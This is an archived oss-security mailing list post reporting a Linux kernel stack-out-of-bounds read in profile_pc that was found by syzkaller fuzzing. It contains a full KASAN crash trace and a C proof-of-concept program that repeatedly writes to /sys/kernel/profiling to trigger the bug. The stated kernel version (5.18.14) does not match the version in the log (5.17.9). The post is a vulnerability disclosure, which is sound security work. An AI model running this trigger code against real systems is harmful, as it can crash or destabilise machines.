Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Thu, 18 Aug 2022 05:41:30 +0000
From: 黄 晓 <NigelXiao@...look.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Linux kernel: stack-out-of-bounds in profile_pc

Hello:
      
      I found a bug through the syzkaller fuzz tool, you need to set CONFIG_KASAN=y, the crash information is displayed as out-of-bounds reading, I am weak and unable to analyze the harm of this bug.
The bug program cannot be reproduced stably and needs to be run multiple times.

Kernel version: 5.18.14
gcc version: 9.4.0


[   49.449543] ==================================================================
[   49.463836] BUG: KASAN: stack-out-of-bounds in profile_pc+0x59/0x90
[   49.466434] Read of size 8 at addr ffff88800a137cd0 by task sh/105
[   49.466879]
[   49.467144] CPU: 2 PID: 105 Comm: sh Not tainted 5.17.9 #3
[   49.467436] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[   49.467774] Call Trace:
[   49.467954]  <IRQ>
[   49.468121]  dump_stack_lvl+0x34/0x44
[   49.474368]  print_address_description.constprop.0+0x21/0x150
[   49.478895]  ? profile_pc+0x59/0x90
[   49.479192]  ? profile_pc+0x59/0x90
[   49.479479]  kasan_report.cold+0x7f/0x11b
[   49.479684]  ? profile_pc+0x59/0x90
[   49.479874]  ? _raw_spin_lock+0x92/0xd0
[   49.480112]  profile_pc+0x59/0x90
[   49.480438]  profile_tick+0x67/0x90
[   49.480974]  tick_sched_timer+0x7c/0xa0
[   49.482393]  __hrtimer_run_queues+0x1c6/0x420
[   49.482901]  ? tick_sched_handle.isra.0+0x80/0x80
[   49.483139]  ? enqueue_hrtimer+0xf0/0xf0
[   49.483329]  ? _raw_read_lock_bh+0x40/0x40
[   49.483669]  ? recalibrate_cpu_khz+0x10/0x10
[   49.483959]  ? recalibrate_cpu_khz+0x10/0x10
[   49.484137]  ? ktime_get_update_offsets_now+0x96/0x150
[   49.484531]  hrtimer_interrupt+0x1b6/0x350
[   49.484777]  __sysvec_apic_timer_interrupt+0xac/0x200
[   49.485025]  sysvec_apic_timer_interrupt+0x89/0xc0
[   49.485554]  </IRQ>
[   49.485759]  <TASK>
[   49.485879]  asm_sysvec_apic_timer_interrupt+0x12/0x20
[   49.486309] RIP: 0010:_raw_spin_lock+0x92/0xd0
[   49.486720] Code: 24 20 00 00 00 00 e8 0d 82 ee fe be 04 00 00 00 48 8d 7c 24 20 e8 fe 81 ee fe ba 01 00 00 00 8b 44 24 20 f0 0f b1 55 00 75 29 <48> b8 00 00 00 00 00 fc ff df 48 c7 04 03 00 00 00 004
[   49.487645] RSP: 0000:ffff88800a137cd0 EFLAGS: 00000246
[   49.488392] RAX: 0000000000000000 RBX: 1ffff11001426f9a RCX: ffffffff82445932
[   49.488762] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff88800a137cf0
[   49.489162] RBP: ffffea000027f228 R08: 0000000000000001 R09: ffffed1001426f9f
[   49.489577] R10: 0000000000000003 R11: ffffed1001426f9e R12: 0000000009fc8067
[   49.489926] R13: ffff888000000688 R14: 000fffffffe00000 R15: 0000000009fc8067
[   49.490285]  ? _raw_spin_lock+0x82/0xd0
[   49.490602]  ? _raw_spin_lock_irqsave+0xe0/0xe0
[   49.490844]  ? _raw_spin_unlock+0x16/0x30
[   49.491148]  ? do_wp_page+0x389/0x5f0
[   49.491368]  __handle_mm_fault+0x633/0x10d0
[   49.491576]  ? __pmd_alloc+0x240/0x240
[   49.491764]  ? down_read_trylock+0x102/0x160
[   49.491978]  handle_mm_fault+0x99/0x220
[   49.492183]  do_user_addr_fault+0x272/0x870
[   49.492380]  exc_page_fault+0x57/0xc0
[   49.492577]  ? asm_exc_page_fault+0x8/0x30
[   49.492775]  asm_exc_page_fault+0x1e/0x30
[   49.492975] RIP: 0033:0x44c5ba
[   49.493374] Code: 00 48 8d 57 07 48 83 fa 0e 76 09 48 c1 ff 03 e8 29 d2 ff ff 49 83 c7 08 eb b1 c6 83 d1 00 00 00 00 e8 b4 c1 ff ff 41 83 fd 02 <c6> 05 38 4b 28 00 00 0f 84 a7 00 00 00 41 f6 44 24 1f5
[   49.494114] RSP: 002b:00007fff75b9d630 EFLAGS: 00000293
[   49.494334] RAX: 0000000001c5b010 RBX: 0000000001c5b010 RCX: 00007f6523d29760
[   49.494599] RDX: 0000000000000000 RSI: 0000000001c5b370 RDI: 0000000000000000
[   49.494922] RBP: 0000000001c5b370 R08: 00007f652424f740 R09: 0000000000000000
[   49.495274] R10: 00007f652424fa10 R11: 0000000000000246 R12: 0000000001c5d950
[   49.495550] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000001c5b2f0
[   49.495851]  </TASK>
[   49.496028]
[   49.496167] The buggy address belongs to the page:
[   49.496496] page:(____ptrval____) refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0xa137
[   49.497096] flags: 0x100000000000000(node=0|zone=1)
[   49.497612] raw: 0100000000000000 ffffea0000284dc8 ffffea0000284dc8 0000000000000000
[   49.497851] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
[   49.498061] page dumped because: kasan: bad access detected
[   49.498263]
[   49.498325] addr ffff88800a137cd0 is located in stack of task sh/105 at offset 0 in frame:
[   49.498527]  _raw_spin_lock+0x0/0xd0
[   49.498920]
[   49.498992] this frame has 1 object:
[   49.501589]  [32, 36) 'val'
[   49.501741]
[   49.502017] Memory state around the buggy address:
[   49.502406]  ffff88800a137b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   49.502818]  ffff88800a137c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   49.503125] >ffff88800a137c80: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f3
[   49.503502]                                                  ^
[   49.504015]  ffff88800a137d00: f3 f3 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1
[   49.504269]  ffff88800a137d80: f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00
[   49.504626] ==================================================================
[   49.504961] Disabling lock debugging due to kernel taint

POC:
'''
#define _GNU_SOURCE

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

uint64_t r[1] = {0xffffffffffffffff};

int main(void)
{
  syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
  syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
  syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
  intptr_t res = 0;
  memcpy((void*)0x20000040, "/sys/kernel/profiling", 21);
  res =
      syscall(__NR_openat, 0xffffffffffffff9cul, 0x20000040ul, 0xe8502ul, 0ul);
  if (res != -1)
    r[0] = res;
  sprintf((char*)0x200000c0, "%023llo", (long long)r[0]);
  sprintf((char*)0x200000d7, "%020llu", (long long)-1);
  sprintf((char*)0x200000eb, "%023llo", (long long)-1);
  sprintf((char*)0x20000102, "%020llu", (long long)-1);
  sprintf((char*)0x20000116, "%023llo", (long long)-1);
  sprintf((char*)0x2000012d, "%023llo", (long long)r[0]);
  while(1)syscall(__NR_write, r[0], 0x200000c0ul, 0xbul);
  return 0;
}
'''
GK

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.